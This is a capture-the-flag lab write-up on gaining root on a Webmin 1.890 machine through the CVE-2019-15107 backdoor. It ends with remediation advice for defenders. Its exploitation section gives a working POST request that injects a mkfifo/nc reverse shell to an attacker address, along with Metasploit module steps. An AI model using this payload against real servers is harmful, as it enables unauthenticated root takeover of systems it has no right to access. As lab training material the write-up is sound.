Target IP: source.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Source” is a Linux machine hosting a vulnerable version of Webmin (1.890). Initial access and privilege escalation are achieved simultaneously by exploiting CVE-2019-15107. This vulnerability is a backdoor in the password_change.cgi module that allows Unauthenticated Remote Code Execution (RCE) with Root privileges.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port scanning.
  • T1190 (Exploit Public-Facing App): Exploiting Webmin 1.890 Backdoor (CVE-2019-15107).
  • T1195 (Supply Chain Compromise): The nature of the vulnerability itself.

2. Operational Setup

Host Configuration

echo "10.10.x.x source.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Your Nmap scan provided the critical lead immediately:

  • 22/tcp (SSH): OpenSSH 7.6p1.
  • 10000/tcp (HTTP): MiniServ 1.890 (Webmin httpd).
  • Note: Webmin typically runs over HTTPS (SSL), even on port 10000. Nmap detected it as http or ssl/http.

B. Service Enumeration (Webmin)

Browsing to https://source.thm:10000 presents the Webmin login page.

  • Service: System Administration tool for Linux.
  • Version: 1.890 (Visible in Nmap or sometimes on the login page).

4. Vulnerability Analysis: The Backdoor

The History (CVE-2019-15107)

In 2019, it was discovered that a threat actor had compromised the build infrastructure of Webmin. They modified the source code of password_change.cgi to include a command injection vulnerability.

The Malicious Code: The backdoor checks if the old parameter (current password) matches a specific condition. If the password change feature is enabled, passing a pipe | in the old parameter executes the following command as root.

Checking Vulnerability

We can verify this without a full shell by checking if the server responds to the malicious parameter.

  • Search: searchsploit webmin 1.890
  • Result: Webmin 1.890 - 'password_change.cgi' Remote Command Execution.

5. Exploitation: “Boom, Root Shell”

Since Webmin runs as root to perform system administration tasks, exploiting it grants immediate root access. There is no horizontal or vertical privilege escalation required.

Method 1: Python Script (Manual)

You likely used a script that sends a POST request to the password change endpoint.

The Request:

POST /password_change.cgi HTTP/1.1
Host: source.thm:10000
Referer: https://source.thm:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
 
user=root&pam=&expired=2&old=test|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f&new1=test2&new2=test2
  • Injection Point: old=test|COMMAND

Method 2: Metasploit (The Easy Button)

msfconsole
use exploit/linux/http/webmin_backdoor
set RHOSTS source.thm
set RPORT 10000
set SSL true
set LHOST tun0
run

Status:

# whoami
root

Flags:

  • User: /home/dark/user.txt
  • Root: /root/root.txt

6. Remediation (Blue Team)

  1. Update Webmin: This specific backdoor was removed in version 1.930. Update immediately.
  2. Restrict Access:
  • Management interfaces like Webmin (Port 10000) should not be exposed to the public internet.
  • Use a VPN or Firewall rules to restrict access to trusted IPs only.
  1. Disable Password Change: If updating is not possible immediately, disable the “Password Change” functionality in Webmin configuration, as the backdoor relies on this feature being active.